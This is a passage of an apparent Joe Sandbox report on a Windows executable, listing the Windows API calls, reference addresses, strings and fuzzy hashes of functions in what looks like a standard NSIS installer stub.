                                              • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000001), ref: 004026F1
                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,?,?,?,00000001), ref: 00402714
                                              • MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,00000001,?,00000001,?,?,?,?,?,00000001), ref: 0040272A
                                                • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5
                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                              • String ID: 9
                                              • API String ID: 163830602-2366072709
                                              • Opcode ID: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
                                              • Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
                                              • Opcode Fuzzy Hash: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
                                              • Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59
                                              APIs
                                              • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                              • lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                              • lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                              • SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                              • String ID:
                                              • API String ID: 2531174081-0
                                              • Opcode ID: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
                                              • Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
                                              • Opcode Fuzzy Hash: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
                                              • Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8
                                              APIs
                                              • DestroyWindow.USER32(?,00000000), ref: 00402EA9
                                              • GetTickCount.KERNEL32 ref: 00402EC7
                                              • wsprintfW.USER32 ref: 00402EF5
                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                              • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                              • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                • Part of subcall function 00402E72: MulDiv.KERNEL32(?,?,?), ref: 00402E87
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                              • String ID: ... %d%%
                                              • API String ID: 722711167-2449383134
                                              • Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                              • Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
                                              • Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                              • Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
                                              APIs
                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                              • GetMessagePos.USER32 ref: 00404D3D
                                              • ScreenToClient.USER32(?,?), ref: 00404D57
                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: Message$Send$ClientScreen
                                              • String ID: f
                                              • API String ID: 41195575-1993550816
                                              • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                              • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                              • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                              • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                              APIs
                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                              • wsprintfW.USER32 ref: 004067A4
                                              • LoadLibraryExW.KERNEL32(?,00000000,?), ref: 004067B8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                              • String ID: %s%S.dll$UXTHEME$\
                                              • API String ID: 2200240437-1946221925
                                              • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                              • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                              • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                              • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798
                                              APIs
                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                              • wsprintfW.USER32 ref: 00402E45
                                              • SetWindowTextW.USER32(?,?), ref: 00402E55
                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: Text$ItemTimerWindowwsprintf
                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                              • API String ID: 1451636040-1158693248
                                              • Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                              • Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
                                              • Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                              • Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
                                              APIs
                                                • Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
                                                • Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                              • GlobalAlloc.KERNEL32(?,?), ref: 00402901
                                              • CloseHandle.KERNEL32(?), ref: 00402981
                                                • Part of subcall function 0040345D: SetFilePointer.KERNEL32(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                              • GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 0040291D
                                              • GlobalFree.KERNEL32(?), ref: 00402956
                                              • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                • Part of subcall function 004031D6: SetFilePointer.KERNEL32(0040A230,00000000,00000000,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 004031FB
                                              • DeleteFileW.KERNEL32(?), ref: 00402995
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: File$Global$AllocFreePointer$AttributesCloseCreateDeleteHandle
                                              • String ID:
                                              • API String ID: 488507980-0
                                              • Opcode ID: 5d9f1b6731ba3ee9933b863f84e8f8121980e79eb03ea1cc287d750f51a4a2c2
                                              • Instruction ID: a72baa4c232b972dd9d74bdb0255e4e47dd94c062f2630ea412bfe515796ae85
                                              • Opcode Fuzzy Hash: 5d9f1b6731ba3ee9933b863f84e8f8121980e79eb03ea1cc287d750f51a4a2c2
                                              • Instruction Fuzzy Hash: 7A216DB1D00118BBCF116FA5DE48CAE7E79EF09364F10013AF5947A2E0CB794D419B98
                                              APIs
                                              • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                              • wsprintfW.USER32 ref: 00404CB6
                                              • SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: ItemTextlstrlenwsprintf
                                              • String ID: %u.%u%s%s$(7B
                                              • API String ID: 3540041739-1320723960
                                              • Opcode ID: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
                                              • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                              • Opcode Fuzzy Hash: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
                                              • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                              APIs
                                              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,771B3420,004036EF,?,00000006,?,0000000A), ref: 004066DF
                                              • CharNextW.USER32(?,?,?,00000000,?,00000006,?,0000000A), ref: 004066EE
                                              • CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,771B3420,004036EF,?,00000006,?,0000000A), ref: 004066F3
                                              • CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,771B3420,004036EF,?,00000006,?,0000000A), ref: 00406706
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: Char$Next$Prev
                                              • String ID: *?|<>/":
                                              • API String ID: 589700163-165019052
                                              • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                              • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                              • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                              • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                              APIs
                                              • lstrcatW.KERNEL32(00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017B0
                                              • CompareFileTime.KERNEL32(-00000014,?,0040A5D8,0040A5D8,00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017D5
                                                • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,?,00403576,00429240,NSIS Error,?,00000006,?,0000000A), ref: 004063F5
                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                              • String ID:
                                              • API String ID: 1941528284-0
                                              • Opcode ID: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
                                              • Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
                                              • Opcode Fuzzy Hash: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
                                              • Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E
                                              APIs
                                              • GetDC.USER32(?), ref: 00401DBC
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                              • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                              • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                              • String ID:
                                              • API String ID: 3808545654-0
                                              • Opcode ID: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
                                              • Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
                                              • Opcode Fuzzy Hash: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
                                              • Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
                                              APIs
                                              • GetDlgItem.USER32(?,?), ref: 00401D63
                                              • GetClientRect.USER32(00000000,?), ref: 00401D70
                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                              • DeleteObject.GDI32(00000000), ref: 00401DAE
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                              • String ID:
                                              • API String ID: 1849352358-0
                                              • Opcode ID: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
                                              • Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
                                              • Opcode Fuzzy Hash: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
                                              • Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
                                              APIs
                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: MessageSend$Timeout
                                              • String ID: !
                                              • API String ID: 1777923405-2657877971
                                              • Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                              • Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
                                              • Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                              • Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
                                              APIs
                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: Close$Enum
                                              • String ID:
                                              • API String ID: 464197530-0
                                              • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                              • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                              • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                              • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58
                                              APIs
                                              • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405962
                                              • GetLastError.KERNEL32 ref: 00405976
                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                              • GetLastError.KERNEL32 ref: 00405995
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                              • String ID:
                                              • API String ID: 3449924974-0
                                              • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                              • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                              • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                              • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9
                                              APIs
                                                • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,?,00403576,00429240,NSIS Error,?,00000006,?,0000000A), ref: 004063F5
                                                • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,00437800,?,771B2EE0,00405B1A,?,00437800,771B2EE0,00000000), ref: 00405D76
                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                              • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,00437800,?,771B2EE0,00405B1A,?,00437800,771B2EE0,00000000), ref: 00405E1E
                                              • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,771B2EE0,00405B1A,?,00437800,771B2EE0), ref: 00405E2E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                              • String ID: 0_B
                                              • API String ID: 3248276644-2128305573
                                              • Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                              • Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
                                              • Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                              • Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
                                              APIs
                                              • IsWindowVisible.USER32(?), ref: 004053F3
